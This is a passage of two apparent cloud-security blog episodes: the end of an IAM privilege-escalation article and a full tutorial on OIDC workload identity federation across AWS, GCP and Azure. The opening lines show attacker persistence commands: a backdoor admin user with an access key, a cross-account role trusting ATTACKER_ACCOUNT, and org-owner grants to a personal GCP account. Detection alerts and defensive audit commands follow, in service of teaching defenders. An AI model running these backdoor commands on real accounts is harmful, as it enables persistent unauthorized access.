  --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
aws iam create-access-key --user-name svc-backup-01
# Valid until manually deleted — survives key rotation on other identities

# AWS: cross-account backdoor — hardest to find during IR
aws iam create-role --role-name svc-monitoring-role \
  --assume-role-policy-document '{
    "Principal": {"AWS": "arn:aws:iam::ATTACKER_ACCOUNT:root"},
    "Action": "sts:AssumeRole"
  }'
aws iam attach-role-policy --role-name svc-monitoring-role \
  --policy-arn arn:aws:iam::aws:policy/ReadOnlyAccess

# GCP: add personal account at org level — survives project deletion
gcloud organizations add-iam-policy-binding ORG_ID \
  --member="user:[email protected]" --role="roles/owner"

Cross-account backdoors are particularly resilient — incident responders often focus on the compromised account without auditing trust relationships with external accounts.


Detection — What to Alert On

Activity Event to Watch Priority
Role trust policy modified UpdateAssumeRolePolicy Critical
New IAM user created CreateUser High
Policy version created CreatePolicyVersion High
Policy attached to role AttachRolePolicy, PutRolePolicy High
SA key created (GCP) google.iam.admin.v1.CreateServiceAccountKey High
Role assignment at subscription scope (Azure) roleAssignments/write at /subscriptions/ Critical
CloudTrail logging disabled StopLogging, DeleteTrail Critical
GetSecretValue at unusual hours secretsmanager:GetSecretValue Medium

IAM events are low-volume in most accounts. That makes anomaly detection straightforward — a spike in IAM API calls outside business hours from an unusual principal is a strong signal. Configure the critical-priority events as real-time alerts, not just logged events.


⚠ Production Gotchas

╔══════════════════════════════════════════════════════════════════════╗
║  ⚠  GOTCHA 1 — "We have SCPs, so individual role permissions       ║
║       don't matter as much"                                          ║
║                                                                      ║
║  SCPs set the ceiling. If an SCP allows iam:PassRole, any role      ║
║  with that permission can exploit it regardless of how "scoped"     ║
║  the SCP looks. SCPs and role-level permissions both need to be     ║
║  reviewed — they are independent layers.                            ║
╚══════════════════════════════════════════════════════════════════════╝

╔══════════════════════════════════════════════════════════════════════╗
║  ⚠  GOTCHA 2 — Permissions boundary doesn't stop iam:PassRole     ║
║                                                                      ║
║  A permissions boundary caps what a role can do directly. It does   ║
║  NOT prevent that role from passing a more powerful role to a       ║
║  Lambda or EC2. iam:PassRole escalation bypasses the boundary       ║
║  because the attacker is operating through the service, not         ║
║  directly through the bounded role.                                 ║
║                                                                      ║
║  Fix: scope iam:PassRole to specific ARNs regardless of whether     ║
║  a permissions boundary is in place.                                ║
╚══════════════════════════════════════════════════════════════════════╝

╔══════════════════════════════════════════════════════════════════════╗
║  ⚠  GOTCHA 3 — CloudTrail doesn't log data plane events by default ║
║                                                                      ║
║  S3 object reads (GetObject), Secrets Manager reads (GetSecretValue)║
║  and SSM GetParameter are data events — not logged by CloudTrail   ║
║  unless you explicitly enable Data Events. An attacker exfiltrating ║
║  data via these calls leaves no trace in a default CloudTrail       ║
║  configuration.                                                      ║
║                                                                      ║
║  Fix: enable S3 and Lambda data events in CloudTrail. At minimum    ║
║  enable logging for secretsmanager:GetSecretValue.                  ║
╚══════════════════════════════════════════════════════════════════════╝

Quick Reference

┌──────────────────────────────────┬──────────────────────────────────────────────────────┐
│ Permission                       │ Escalation Path                                      │
├──────────────────────────────────┼──────────────────────────────────────────────────────┤
│ iam:CreatePolicyVersion          │ Rewrite your own policy to grant *:*                 │
│ iam:PassRole (Resource: *)       │ Assign AdminRole to a Lambda/EC2 you control         │
│ iam:CreateRole+AttachRolePolicy  │ Create and arm a backdoor cross-account role         │
│ iam:UpdateAssumeRolePolicy       │ Hijack existing admin role's trust policy            │
│ iam.serviceAccounts.actAs (GCP)  │ Impersonate any service account including admins     │
│ iam.serviceAccountKeys.create    │ Generate permanent key for any SA                    │
│ roleAssignments/write (Azure)    │ Assign Owner to yourself at subscription scope       │
└──────────────────────────────────┴──────────────────────────────────────────────────────┘

Defensive commands:
┌────────────────────────────────────────────────────────────────────────────────────────┐
│  # AWS — find all roles with iam:PassRole on Resource: *                              │
│  aws iam list-policies --scope Local --query 'Policies[*].Arn' --output text | \     │
│    xargs -I{} aws iam get-policy-version \                                            │
│      --policy-arn {} --version-id v1 --query 'PolicyVersion.Document'                │
│                                                                                        │
│  # AWS — check who can assume a given role                                            │
│  aws iam get-role --role-name AdminRole \                                             │
│    --query 'Role.AssumeRolePolicyDocument'                                            │
│                                                                                        │
│  # AWS — simulate whether a principal can CreatePolicyVersion                        │
│  aws iam simulate-principal-policy \                                                  │
│    --policy-source-arn arn:aws:iam::ACCOUNT:role/DevRole \                           │
│    --action-names iam:CreatePolicyVersion \                                           │
│    --resource-arns arn:aws:iam::ACCOUNT:policy/DevPolicy                             │
│                                                                                        │
│  # GCP — check who has actAs on a service account                                    │
│  gcloud iam service-accounts get-iam-policy SA_EMAIL \                               │
│    --format=json | jq '.bindings[] | select(.role=="roles/iam.serviceAccountUser")'  │
│                                                                                        │
│  # GCP — list service account keys (find persistent backdoors)                       │
│  gcloud iam service-accounts keys list --iam-account=SA_EMAIL                        │
│                                                                                        │
│  # Azure — list all role assignments at subscription scope                           │
│  az role assignment list --scope /subscriptions/SUB_ID --output table                │
└────────────────────────────────────────────────────────────────────────────────────────┘

Framework Alignment

Framework Reference What It Covers Here
CISSP Domain 6 — Security Assessment and Testing IAM attack paths are the foundation of cloud penetration testing and access review methodology
CISSP Domain 5 — Identity and Access Management Defensive IAM design requires understanding offensive technique — you cannot protect paths you don’t know exist
ISO 27001:2022 8.8 Management of technical vulnerabilities IAM misconfigurations are technical vulnerabilities — identifying and remediating privilege escalation paths
ISO 27001:2022 8.16 Monitoring activities Detection signals and alerting on IAM mutations as part of continuous monitoring
SOC 2 CC7.1 Threat and vulnerability identification — this episode maps the threat model for cloud IAM
SOC 2 CC6.1 Understanding attack paths informs the design of logical access controls that actually hold

Key Takeaways

  • Cloud breaches are IAM events — the initial compromise is just the door; IAM misconfigurations determine how far an attacker can go
  • iam:PassRole with Resource: * is AWS’s highest-risk single permission — scope it to specific role ARNs or the escalation paths multiply
  • iam:CreatePolicyVersion and iam:UpdateAssumeRolePolicy are privilege escalation and persistence primitives — restrict them to dedicated admin roles
  • iam.serviceAccounts.actAs in GCP and roleAssignments/write in Azure are direct equivalents — same threat model, cloud-specific syntax
  • Enforce IMDSv2 on EC2; disable SA key creation org-wide in GCP; restrict role assignment scope in Azure
  • Enable CloudTrail Data Events — default logging misses S3 reads, Secrets Manager reads, and SSM GetParameter calls entirely
  • Alert on IAM mutations — low-volume, high-signal events that should never go unmonitored

What’s Next

You now know how attackers move through misconfigured IAM. AWS least privilege audit is the defensive counterpart — using Access Analyzer, GCP IAM Recommender, and Azure Access Reviews to find and right-size over-permissioned access before an attacker does. The goal: get from wildcard policies to scoped, auditable permissions without breaking production.

Next: AWS Least Privilege Audit: From Wildcard Permissions to Scoped Policies

Get EP09 in your inbox when it publishes → linuxcent.com/subscribe

OIDC Workload Identity: Eliminate Cloud Access Keys Entirely

Reading Time: 12 minutes


What Is Cloud IAMAuthentication vs AuthorizationIAM Roles vs PoliciesAWS IAM Deep DiveGCP Resource Hierarchy IAMAzure RBAC ScopesOIDC Workload Identity


TL;DR

  • Workload identity federation replaces static cloud access keys with short-lived tokens tied to runtime identity — no key to rotate, no secret to leak
  • The OIDC token exchange pattern is consistent across AWS (IRSA / Pod Identity), GCP (Workload Identity), and Azure (AKS Workload Identity) — learn one, translate the others
  • AWS EKS: use Pod Identity for new clusters; IRSA is the pattern for existing ones — both eliminate static keys
  • GCP GKE: --workload-pool at cluster level + roles/iam.workloadIdentityUser binding on the GCP service account
  • Azure AKS: federated credential on a managed identity + azure.workload.identity/use: "true" pod label
  • Cross-cloud federation works: an AWS IAM role can call GCP APIs without a GCP key file on the AWS side
  • Enforce IMDSv2 everywhere; pin OIDC trust conditions to specific service account names; give each workload its own identity

The Big Picture

  WORKLOAD IDENTITY FEDERATION — BEFORE AND AFTER

  ── STATIC CREDENTIALS (the broken model) ────────────────────────────────

  IAM user created → access key generated
         ↓
  Key distributed to pods / CI / servers → stored in Secrets, env vars, .env
         ↓
  Valid indefinitely — never expires on its own
         ↓
  Rotation is manual, painful, deferred ("there's a ticket for that")
         ↓
  Key proliferates across environments — you lose track of every copy
         ↓
  Leaked key → unlimited blast radius until someone notices and revokes it

  ── WORKLOAD IDENTITY FEDERATION (the current model) ─────────────────────

  No key created. No key distributed. No key to rotate.

  Workload starts → requests signed JWT from its native IdP
         │           (EKS OIDC issuer, GitHub Actions, GKE metadata server)
         ↓
  JWT carries workload claims: namespace, service account, repo, instance ID
         ↓
  Cloud STS / token endpoint validates JWT signature + trust conditions
         ↓
  Short-lived credential issued  (AWS STS: 1–12h  |  GCP/Azure: ~1h)
         ↓
  Credential expires automatically — nothing to clean up
         ↓
  Token stolen → usable for 1 hour maximum, audience-bound, not reusable

Workload identity federation is the architectural answer to static credential sprawl. The workload’s proof of identity is its runtime environment — the cluster it runs in, the repository it belongs to, the service account it uses. The cloud provider never issues a persistent secret. This episode covers how that exchange works across all three clouds and Kubernetes.


Introduction

Workload identity federation eliminates static cloud credentials by replacing them with short-lived tokens that the runtime environment generates and the cloud provider validates against a registered trust relationship. No key to distribute, no rotation schedule to maintain, no proliferation to track.

A while back I was reviewing a Kubernetes cluster that had been running in production for about two years. The team had done good work — solid app code, reasonable cluster configuration. But when I started looking at how pods were authenticating to AWS, I found what I find in roughly 60% of environments I look at.

Twelve service accounts. Twelve access key pairs. Keys created 6 to 24 months ago. Stored as Kubernetes Secrets. Mounted into pods as environment variables. Never rotated because “the app would need to be restarted” and nobody owned the rotation schedule. Two of the keys belonged to AWS IAM users who no longer worked at the company — the users had been deactivated, but the access keys were still valid because in AWS, access keys live independently of console login status.

When I asked who was responsible for rotating these, the answer I got was: “There’s a ticket for that.”

There’s always a ticket for that.

The engineering problem here isn’t that the team was careless. It’s that static credentials are fundamentally unmanageable at scale. Workload identity removes the problem at its root.


Why Static Credentials Are the Wrong Model for Machines

Before getting into solutions, let me be precise about why this is a security problem, not just an operational inconvenience.

Static credentials have four fundamental failure modes:

They don’t expire. An AWS access key created in 2022 is valid in 2026 unless someone explicitly rotates it. GitGuardian’s 2024 data puts the average time from secret creation to detection at 328 days. That’s almost a year of exposure window before anyone even knows.

They lose origin context. When an API call arrives at AWS with an access key, the authorization system can tell you what key was used — not whether it was used by your Lambda function, by a developer debugging something, or by an attacker using a stolen copy. Static credentials are context-blind.

They proliferate invisibly. One key, distributed to a team, copied into three environments, cached on developer laptops, stored in a CI/CD pipeline, pasted into a config file in a test environment that got committed. By the time you need to rotate it, you don’t know all the places it lives.

Rotation is operationally painful. Creating a new key, updating every place the old key lives, removing the old key — while ensuring nothing breaks during the transition — is a coordination exercise that organizations consistently defer. Every month the rotation doesn’t happen is another month of accumulated risk.

Workload identity solves all four by replacing persistent credentials with short-lived tokens that are generated from the runtime environment and verified by the cloud provider against a registered trust relationship.


The OIDC Exchange — What’s Actually Happening

All three major cloud providers have converged on the same underlying mechanism: OIDC token exchange.

Workload (pod, GitHub Actions runner, EC2 instance, on-prem server)
    │
    │  1. Request a signed JWT from the native identity provider
    │     (EKS OIDC server, GitHub's token.actions.githubusercontent.com,
    │      GKE metadata server, Azure IMDS)
    ▼
Native IdP issues a JWT. It contains claims about the workload:
    - What repository triggered this CI run
    - What Kubernetes namespace and service account this pod uses
    - What EC2 instance ID this request came from
    │
    │  2. Workload presents the JWT to the cloud STS / federation endpoint
    ▼
Cloud IAM evaluates:
    - Is the JWT signature valid? (verified against the IdP's public keys)
    - Does the issuer match a registered trust relationship?
    - Do the claims match the conditions in the trust policy?
    │
    │  3. If all checks pass: short-lived cloud credentials issued
    │     (AWS: temporary STS credentials, expiry 1-12 hours)
    │     (GCP: OAuth2 access token, expiry ~1 hour)
    │     (Azure: access token, expiry ~1 hour)
    ▼
Workload calls cloud API with short-lived credentials.
Credentials expire. Nothing to clean up. Nothing to rotate.

No static secret is stored anywhere. The workload’s identity is its runtime environment — the cluster it runs in, the repository it belongs to, the service account it uses. If someone steals the short-lived token, it expires in an hour. If someone tries to use a token for a different resource than it was issued for, the audience claim doesn’t match and it’s rejected.


AWS: IRSA and Pod Identity for EKS

IRSA — The Original Pattern

IRSA (IAM Roles for Service Accounts) federates a Kubernetes service account identity with an AWS IAM role. Each pod’s service account is the proof of identity; AWS issues temporary credentials in exchange for the OIDC JWT.

# Step 1: get the OIDC issuer URL for your EKS cluster
OIDC_ISSUER=$(aws eks describe-cluster \
  --name my-cluster \
  --query "cluster.identity.oidc.issuer" \
  --output text)

# Step 2: register this OIDC issuer with IAM
aws iam create-open-id-connect-provider \
  --url "${OIDC_ISSUER}" \
  --client-id-list sts.amazonaws.com \
  --thumbprint-list "$(openssl s_client -connect ${OIDC_ISSUER#https://}:443 2>/dev/null \
    | openssl x509 -fingerprint -noout | cut -d= -f2 | tr -d ':')"

# Step 3: create an IAM role with a trust policy scoped to a specific service account
ACCOUNT_ID=$(aws sts get-caller-identity --query Account --output text)
OIDC_ID="${OIDC_ISSUER#https://}"

cat > irsa-trust.json << EOF
{
  "Version": "2012-10-17",
  "Statement": [{
    "Effect": "Allow",
    "Principal": {
      "Federated": "arn:aws:iam::${ACCOUNT_ID}:oidc-provider/${OIDC_ID}"
    },
    "Action": "sts:AssumeRoleWithWebIdentity",
    "Condition": {
      "StringEquals": {
        "${OIDC_ID}:sub": "system:serviceaccount:production:app-backend",
        "${OIDC_ID}:aud": "sts.amazonaws.com"
      }
    }
  }]
}
EOF

aws iam create-role \
  --role-name app-backend-s3-role \
  --assume-role-policy-document file://irsa-trust.json

aws iam put-role-policy \
  --role-name app-backend-s3-role \
  --policy-name AppBackendPolicy \
  --policy-document file://app-backend-policy.json
# Step 4: annotate the Kubernetes service account with the role ARN
apiVersion: v1
kind: ServiceAccount
metadata:
  name: app-backend
  namespace: production
  annotations:
    eks.amazonaws.com/role-arn: arn:aws:iam::123456789012:role/app-backend-s3-role

The EKS Pod Identity webhook injects two environment variables into any pod using this service account: AWS_WEB_IDENTITY_TOKEN_FILE pointing to a projected token, and AWS_ROLE_ARN. The AWS SDK reads these automatically. The application doesn’t know any of this is happening — it just calls S3 and it works, using credentials that were never stored anywhere and expire automatically.

The trust policy’s sub condition is the security boundary. system:serviceaccount:production:app-backend means: only pods in the production namespace using the app-backend service account can assume this role. A pod in a different namespace, even with the same service account name, gets a different sub claim and the assumption fails.

EKS Pod Identity — The Simpler Modern Approach

AWS released Pod Identity as a simpler alternative to IRSA. No OIDC provider setup, no manual trust policy with OIDC conditions:

# Enable the Pod Identity agent addon on the cluster
aws eks create-addon \
  --cluster-name my-cluster \
  --addon-name eks-pod-identity-agent

# Create the association — this replaces the OIDC trust policy setup
aws eks create-pod-identity-association \
  --cluster-name my-cluster \
  --namespace production \
  --service-account app-backend \
  --role-arn arn:aws:iam::123456789012:role/app-backend-s3-role

Same result, less ceremony. For new clusters, Pod Identity is the path I’d recommend. IRSA remains important to understand for the many existing clusters already using it.

IAM Roles Anywhere — For On-Premises Workloads

Not everything runs in Kubernetes. For on-premises servers and workloads outside AWS, IAM Roles Anywhere issues temporary credentials to servers that present an X.509 certificate signed by a trusted CA:

# Register your internal CA as a trust anchor
aws rolesanywhere create-trust-anchor \
  --name "OnPremCA" \
  --source sourceType=CERTIFICATE_BUNDLE,sourceData.x509CertificateData="$(base64 -w0 ca-cert.pem)"

# Create a profile mapping the CA to allowed roles
aws rolesanywhere create-profile \
  --name "OnPremServers" \
  --role-arns "arn:aws:iam::123456789012:role/OnPremAppRole" \
  --trust-anchor-arns "${TRUST_ANCHOR_ARN}"

# On the on-prem server — exchange the certificate for AWS credentials
aws_signing_helper credential-process \
  --certificate /etc/pki/server.crt \
  --private-key /etc/pki/server.key \
  --trust-anchor-arn "${TRUST_ANCHOR_ARN}" \
  --profile-arn "${PROFILE_ARN}" \
  --role-arn "arn:aws:iam::123456789012:role/OnPremAppRole"

The server’s certificate (managed by your internal PKI or an ACM Private CA) is the proof of identity. No access key distributed to the server — just a certificate that your CA signed and that you can revoke through your existing certificate revocation infrastructure.


GCP: Workload Identity for GKE

For GKE clusters, Workload Identity is enabled at the cluster level and creates a bridge between Kubernetes service accounts and GCP service accounts:

# Enable Workload Identity on the cluster
gcloud container clusters update my-cluster \
  --workload-pool=my-project.svc.id.goog

# Enable on the node pool (required for the metadata server to work)
gcloud container node-pools update default-pool \
  --cluster=my-cluster \
  --workload-metadata=GKE_METADATA

# Create the GCP service account for the workload
gcloud iam service-accounts create app-backend \
  --project=my-project

SA_EMAIL="[email protected]"

# Grant the GCP SA the permissions it needs
gcloud storage buckets add-iam-policy-binding gs://app-data \
  --member="serviceAccount:${SA_EMAIL}" \
  --role="roles/storage.objectViewer"

# Create the trust relationship: K8s SA → GCP SA
gcloud iam service-accounts add-iam-policy-binding "${SA_EMAIL}" \
  --role=roles/iam.workloadIdentityUser \
  --member="serviceAccount:my-project.svc.id.goog[production/app-backend]"
# Annotate the Kubernetes service account
apiVersion: v1
kind: ServiceAccount
metadata:
  name: app-backend
  namespace: production
  annotations:
    iam.gke.io/gcp-service-account: [email protected]

When the pod makes a GCP API call using ADC (Application Default Credentials), the GKE metadata server intercepts the credential request. It validates the pod’s Kubernetes identity, checks the IAM binding, and returns a short-lived GCP access token. The GCP service account key file never exists. There’s nothing to protect, nothing to rotate, nothing to leak.


Azure: Workload Identity for AKS

Azure’s workload identity for Kubernetes replaced the older AAD Pod Identity approach — which required a DaemonSet, had known TOCTOU vulnerabilities, and was operationally fragile. The current implementation uses the OIDC pattern:

# Enable OIDC issuer and workload identity on the AKS cluster
az aks update \
  --name my-aks \
  --resource-group rg-prod \
  --enable-oidc-issuer \
  --enable-workload-identity

# Get the OIDC issuer URL for this cluster
OIDC_ISSUER=$(az aks show \
  --name my-aks --resource-group rg-prod \
  --query "oidcIssuerProfile.issuerUrl" -o tsv)

# Create a user-assigned managed identity for the workload
az identity create --name app-backend-identity --resource-group rg-identities
CLIENT_ID=$(az identity show --name app-backend-identity -g rg-identities --query clientId -o tsv)
PRINCIPAL_ID=$(az identity show --name app-backend-identity -g rg-identities --query principalId -o tsv)

# Grant the identity the access it needs
az role assignment create \
  --assignee-object-id "$PRINCIPAL_ID" \
  --role "Storage Blob Data Reader" \
  --scope /subscriptions/SUB_ID/resourceGroups/rg-prod/providers/Microsoft.Storage/storageAccounts/appstore

# Federate: trust the K8s service account from this cluster
az identity federated-credential create \
  --name aks-app-backend-binding \
  --identity-name app-backend-identity \
  --resource-group rg-identities \
  --issuer "${OIDC_ISSUER}" \
  --subject "system:serviceaccount:production:app-backend" \
  --audience "api://AzureADTokenExchange"
apiVersion: v1
kind: ServiceAccount
metadata:
  name: app-backend
  namespace: production
  annotations:
    azure.workload.identity/client-id: "CLIENT_ID_HERE"
---
apiVersion: v1
kind: Pod
metadata:
  labels:
    azure.workload.identity/use: "true"   # triggers token injection
spec:
  serviceAccountName: app-backend
  containers:
  - name: app
    image: my-app:latest
    # Azure SDK DefaultAzureCredential picks up the injected token automatically

Cross-Cloud Federation — When AWS Talks to GCP

The same OIDC mechanism works cross-cloud. An AWS Lambda or EC2 instance can call GCP APIs without any GCP service account key on the AWS side:

# GCP side: create a workload identity pool that trusts AWS
gcloud iam workload-identity-pools create "aws-workloads" --location=global

gcloud iam workload-identity-pools providers create-aws "aws-provider" \
  --workload-identity-pool="aws-workloads" \
  --account-id="AWS_ACCOUNT_ID"

# Bind the specific AWS role to the GCP service account
gcloud iam service-accounts add-iam-policy-binding [email protected] \
  --role=roles/iam.workloadIdentityUser \
  --member="principalSet://iam.googleapis.com/projects/GCP_PROJ_NUM/locations/global/workloadIdentityPools/aws-workloads/attribute.aws_role/arn:aws:sts::AWS_ACCOUNT:assumed-role/MyAWSRole"

The AWS workload presents its STS-issued credentials to GCP’s token exchange endpoint. GCP verifies the AWS signature, checks the attribute mapping (only MyAWSRole from that AWS account), and issues a short-lived GCP access token. No GCP service account key is ever distributed to the AWS side.


The Threat Model — What Workload Identity Doesn’t Solve

Workload identity dramatically reduces the attack surface, but it doesn’t eliminate it:

Threat What Still Applies Mitigation
Token theft from the container filesystem The projected token is readable if you have container filesystem access Short TTL (default 1h); tokens are audience-bound — can’t use a K8s token to call Azure APIs
SSRF to metadata service An SSRF vulnerability can fetch credentials from the metadata endpoint Enforce IMDSv2 on AWS; use metadata server restrictions on GKE/AKS
Overpermissioned service account Workload identity doesn’t enforce least privilege — the SA can still be over-granted One SA per workload; review permissions against actual usage
Trust policy too broad OIDC trust policy allows any service account in a namespace Always pin to specific SA name in the sub condition

The SSRF-to-metadata-service path deserves particular attention. IMDSv2 (mandatory in AWS by requiring a PUT to get a token before any metadata request) blocks most SSRF scenarios because a simple SSRF can only make GET requests. Enforce it:

# Enforce IMDSv2 at instance launch
aws ec2 run-instances \
  --metadata-options HttpTokens=required,HttpPutResponseHopLimit=1

# Enforce org-wide via SCP — no instance can launch without IMDSv2
{
  "Effect": "Deny",
  "Action": "ec2:RunInstances",
  "Resource": "arn:aws:ec2:*:*:instance/*",
  "Condition": {
    "StringNotEquals": {
      "ec2:MetadataHttpTokens": "required"
    }
  }
}

⚠ Production Gotchas

╔══════════════════════════════════════════════════════════════════════╗
║  ⚠  GOTCHA 1 — Trust policy scoped to namespace, not service account ║
║                                                                      ║
║  A condition like "sub": "system:serviceaccount:production:*"        ║
║  grants any pod in the production namespace the ability to assume    ║
║  the role. A compromised or new workload in that namespace gets      ║
║  access automatically.                                               ║
║                                                                      ║
║  Fix: always pin the sub condition to the exact service account      ║
║  name. "system:serviceaccount:production:app-backend" — not a glob.  ║
╚══════════════════════════════════════════════════════════════════════╝

╔══════════════════════════════════════════════════════════════════════╗
║  ⚠  GOTCHA 2 — Shared service accounts across workloads             ║
║                                                                      ║
║  Reusing one service account for multiple workloads saves setup      ║
║  time and creates a lateral movement path. A compromised workload    ║
║  that shares a service account with a payment processor has payment  ║
║  processor permissions.                                              ║
║                                                                      ║
║  Fix: one service account per workload. The overhead is low.         ║
║  The blast radius reduction is significant.                          ║
╚══════════════════════════════════════════════════════════════════════╝

╔══════════════════════════════════════════════════════════════════════╗
║  ⚠  GOTCHA 3 — IMDSv1 still reachable after enabling IMDSv2        ║
║                                                                      ║
║  Enabling IMDSv2 on new instances doesn't affect existing ones.      ║
║  The SCP approach enforces it at the org level going forward, but    ║
║  existing instances need explicit remediation.                       ║
║                                                                      ║
║  Fix: audit existing instances for IMDSv1 exposure.                 ║
║  aws ec2 describe-instances --query                                  ║
║    "Reservations[].Instances[?MetadataOptions.HttpTokens!='required']║
║    .[InstanceId,Tags]"                                               ║
╚══════════════════════════════════════════════════════════════════════╝

Quick Reference

┌────────────────────────────────┬───────────────────────────────────────────────────────┐
│ Term                           │ What it means                                         │
├────────────────────────────────┼───────────────────────────────────────────────────────┤
│ Workload identity federation   │ OIDC-based exchange: runtime JWT → short-lived token  │
│ IRSA                           │ IAM Roles for Service Accounts — EKS + OIDC pattern   │
│ EKS Pod Identity               │ Newer, simpler IRSA replacement — no OIDC setup       │
│ GKE Workload Identity          │ K8s SA → GCP SA via workload pool + IAM binding       │
│ AKS Workload Identity          │ K8s SA → managed identity via federated credential    │
│ IAM Roles Anywhere             │ AWS temp credentials for on-prem via X.509 cert       │
│ IMDSv2                         │ Token-gated AWS metadata service — blocks SSRF        │
│ OIDC sub claim                 │ Workload's unique identity string — use for pinning   │
│ Projected service account token│ K8s-injected JWT — the OIDC token pods present to AWS │
└────────────────────────────────┴───────────────────────────────────────────────────────┘

Key commands:
┌────────────────────────────────────────────────────────────────────────────────────────┐
│  # AWS — list OIDC providers registered in this account                               │
│  aws iam list-open-id-connect-providers                                               │
│                                                                                        │
│  # AWS — list Pod Identity associations for a cluster                                 │
│  aws eks list-pod-identity-associations --cluster-name my-cluster                     │
│                                                                                        │
│  # AWS — verify what credentials a pod is actually using                              │
│  aws sts get-caller-identity   # run from inside the pod                              │
│                                                                                        │
│  # AWS — audit instances missing IMDSv2                                               │
│  aws ec2 describe-instances \                                                          │
│    --query "Reservations[].Instances[?MetadataOptions.HttpTokens!='required']          │
│    .[InstanceId]" --output text                                                        │
│                                                                                        │
│  # GCP — verify workload identity binding on a GCP service account                   │
│  gcloud iam service-accounts get-iam-policy SA_EMAIL                                  │
│                                                                                        │
│  # GCP — list workload identity pools                                                 │
│  gcloud iam workload-identity-pools list --location=global                            │
│                                                                                        │
│  # Azure — list federated credentials on a managed identity                           │
│  az identity federated-credential list \                                               │
│    --identity-name app-backend-identity --resource-group rg-identities                │
└────────────────────────────────────────────────────────────────────────────────────────┘

Framework Alignment

Framework Reference What It Covers Here
CISSP Domain 5 — Identity and Access Management Non-human identities dominate cloud environments; workload identity federation is the modern machine authentication pattern
CISSP Domain 1 — Security & Risk Management Static credential sprawl is a measurable, eliminable risk; workload identity removes it at the root
ISO 27001:2022 5.17 Authentication information Managing machine credentials — workload identity replaces long-lived secrets with short-lived, environment-bound tokens
ISO 27001:2022 8.5 Secure authentication OIDC token exchange is the secure authentication mechanism for machine identities
ISO 27001:2022 5.18 Access rights Service account provisioning and deprovisioning — workload identity ties access to the runtime environment, not a stored secret
SOC 2 CC6.1 Workload identity federation is the preferred technical control for machine-to-cloud authentication in CC6.1
SOC 2 CC6.7 Short-lived, audience-bound tokens restrict credential reuse across systems — addresses transmission and access controls

Key Takeaways

  • Static credentials for machine identities are the problem, not the solution — workload identity federation eliminates them at the root
  • The OIDC token exchange pattern is consistent across AWS (IRSA/Pod Identity), GCP (Workload Identity), and Azure (AKS Workload Identity) — learn one, the others are a translation
  • AWS EKS: use Pod Identity for new clusters; IRSA remains the pattern for existing ones — both eliminate static keys
  • GCP GKE: Workload Identity enabled at cluster level, SA annotation at the K8s service account level
  • Azure AKS: federated credential on the managed identity, azure.workload.identity/use: "true" label on pods
  • Cross-cloud federation works — an AWS IAM role can call GCP APIs without a GCP key file
  • Enforce IMDSv2 everywhere; pin OIDC trust conditions to specific service account names; apply least privilege to the underlying cloud identity

What’s Next

You’ve eliminated the static credential problem. The next question is: what happens when the IAM configuration itself is the vulnerability? AWS IAM privilege escalation goes into the attack paths — how iam:PassRole, iam:CreateAccessKey, and misconfigured trust policies turn IAM misconfigurations into full account compromise. If you’re designing or auditing cloud access control, you need to know these paths before an attacker finds them.

Next: AWS IAM Privilege Escalation: How iam:PassRole Leads to Full Compromise

Get EP08 in your inbox when it publishes → linuxcent.com/subscribe